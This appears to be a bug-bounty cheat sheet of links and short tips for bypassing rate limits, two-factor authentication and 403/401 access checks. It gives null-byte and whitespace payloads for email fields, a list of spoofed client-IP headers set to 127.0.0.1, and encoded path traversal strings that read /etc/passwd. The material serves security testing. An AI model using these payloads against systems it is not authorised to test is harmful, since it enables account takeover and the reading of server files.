Rate Limit Bypass / 2FA / OTP Bypass

• https://medium.com/@huzaifa_tahir/methods-to-bypass-rate-limit-5185e6c67ecd

• Wanna Bypass Rate Limit ? Try Bypass with adding null payload %00, %0d%0a, %09, %0C, %20, %0 on email. Not Works ? Just try adding "blank space" on the email, works!

• https://shahmeeramir.com/4-methods-to-bypass-two-factor-authentication-2b0075d9eb5f

X-Originating-IP: IP
X-Forwarded-For: IP
X-Remote-IP: IP
X-Remote-Addr: IP
X-Client-IP: IP
X-Host: IP
X-Forwared-Host: IP
True-Client-IP: IP
X-Real-IP: IP

I just happened to be able to bypass a 2FA in place during a recent engagement. And this was how I did it. #bugbountyTips #pentestTips Last /setup/ endpoint was by attacker while the first one is as victim.

How to find authentication bypass vulnerabilities. Focus. I Added headers. Request GET /delete?user=test HTTP/1.1 Response HTTP/1.1 401 Unauthorized Reqeust GET /delete?user=test HTTP/1.1 X-Custom-IP-Authorization: 127.0.0.1 Response HTTP/1.1 302 Found #bugbounty #bugbountytips

• https://blog.cobalt.io/bypassing-the-protections-mfa-bypass-techniques-for-the-win-8ef6215de6ab

• https://notifybugme.medium.com/unauthorized-access-to-admin-setpassword-page-by-bypass-403-forbidden-f10bbb92ab35

everytime yu face a 401 Unauthorized respense add this header to the request : X-Custom-IP-Authorization: 127.0.0.1 #bugbountytips / X-Forwarded-Origin: 127.0.0.1

Bug Bounty Technique:

GET /page.php?path=../../etc/passwd

Forbidden 403 ?

Try One Of These:

(1)../../../etc/passwd%00

(2)....//....//....//etc/passwd

(3)%252e%252e%252fetc%252fpasswd

2FA - https://mazoka777.medium.com/two-factor-authentication-bypass-4c814627f8c3

bugbounty/403-bypass at main · aufzayed/bugbountyGitHub